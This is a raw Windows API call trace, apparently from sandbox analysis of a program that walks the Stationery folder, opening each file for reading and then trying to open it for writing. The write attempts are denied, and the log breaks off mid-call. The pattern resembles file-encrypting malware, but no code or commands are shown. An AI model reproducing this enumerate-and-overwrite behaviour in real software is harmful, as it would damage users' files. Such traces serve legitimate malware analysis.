[0087.385] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.385] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.385] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.385] CloseHandle (hObject=0x424) returned 1 [0087.386] AreFileApisANSI () returned 1 [0087.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0087.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8af48 [0087.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 70 [0087.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.386] GetLastError () returned 0x5 [0087.386] GetLastError () returned 0x5 [0087.386] SetLastError (dwErrCode=0x5) [0087.386] GetLastError () returned 0x5 [0087.386] SetLastError (dwErrCode=0x5) [0087.386] GetLastError () returned 0x5 [0087.386] SetLastError (dwErrCode=0x5) [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0087.386] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.386] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.386] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0087.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0087.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.387] AreFileApisANSI () returned 1 [0087.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg", lpUsedDefaultChar=0x0) returned 70 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0087.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.388] AreFileApisANSI () returned 1 [0087.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0087.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ad80 [0087.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned 70 [0087.388] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.389] GetFileType (hFile=0x424) returned 0x1 [0087.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0087.389] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.389] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.389] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.389] CloseHandle (hObject=0x424) returned 1 [0087.389] AreFileApisANSI () returned 1 [0087.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0087.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a6f8 [0087.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned 70 [0087.390] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.390] GetLastError () returned 0x5 [0087.390] GetLastError () returned 0x5 [0087.390] SetLastError (dwErrCode=0x5) [0087.390] GetLastError () returned 0x5 [0087.390] SetLastError (dwErrCode=0x5) [0087.390] GetLastError () returned 0x5 [0087.390] SetLastError (dwErrCode=0x5) [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0087.390] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.390] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.390] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96dccc65, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0087.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0087.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0087.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.392] AreFileApisANSI () returned 1 [0087.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm", lpUsedDefaultChar=0x0) returned 68 [0087.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.392] AreFileApisANSI () returned 1 [0087.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x823b8 [0087.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 68 [0087.392] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.393] GetFileType (hFile=0x424) returned 0x1 [0087.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0087.393] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.393] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.394] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.394] CloseHandle (hObject=0x424) returned 1 [0087.394] AreFileApisANSI () returned 1 [0087.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82c28 [0087.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 68 [0087.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.394] GetLastError () returned 0x5 [0087.394] GetLastError () returned 0x5 [0087.394] SetLastError (dwErrCode=0x5) [0087.394] GetLastError () returned 0x5 [0087.394] SetLastError (dwErrCode=0x5) [0087.394] GetLastError () returned 0x5 [0087.394] SetLastError (dwErrCode=0x5) [0087.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.395] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96dccc65, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96dccc65, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96dccc65, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0087.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.396] AreFileApisANSI () returned 1 [0087.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg", lpUsedDefaultChar=0x0) returned 68 [0087.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0087.396] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.396] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.396] AreFileApisANSI () returned 1 [0087.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x828c8 [0087.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x828c8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 68 [0087.396] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.397] GetFileType (hFile=0x424) returned 0x1 [0087.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x828c8 | out: hHeap=0x20000) returned 1 [0087.397] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.397] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.397] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: 